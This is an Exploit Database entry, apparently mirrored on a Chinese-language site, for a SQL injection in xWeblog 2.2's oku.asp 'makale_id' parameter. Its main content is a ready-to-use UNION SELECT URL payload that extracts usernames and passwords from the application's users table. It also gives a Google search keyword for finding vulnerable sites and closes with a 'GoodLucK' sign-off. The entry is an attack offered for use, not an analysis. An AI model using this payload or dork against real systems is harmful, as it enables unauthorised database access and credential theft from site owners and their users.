xWeblog 2.2 – ‘oku.asp?makale_id’ SQL Injection

• Exploit Database
• 123 阅读

• 作者： KnocKout
  日期： 2010-10-07
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/15218/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

  =================================================== xWeblog v2.2 - Remote SQL Injection Vulnerability (tr) ===================================================   ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~Web App. : xWeblog v2.2 ~Software: http://www.aspdunyasi.com/goster.asp?id=19 ~Vulnerability Style : (SQLi) ~Google Keywords : "XWEBLOG" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ Explotation ~~~~~~~~~~~ SQL Injection ================================ http://TARGET/path/oku.asp?makale_id=-67%20UNION%20SELECT+0,AD,SIFRE,3,4,5,6,7,8,9,10,11,12%20from%20uyeler ================================ [+]SQL Injected! GoodLucK ;)     # Inj3ct0r.com [2010-09-28]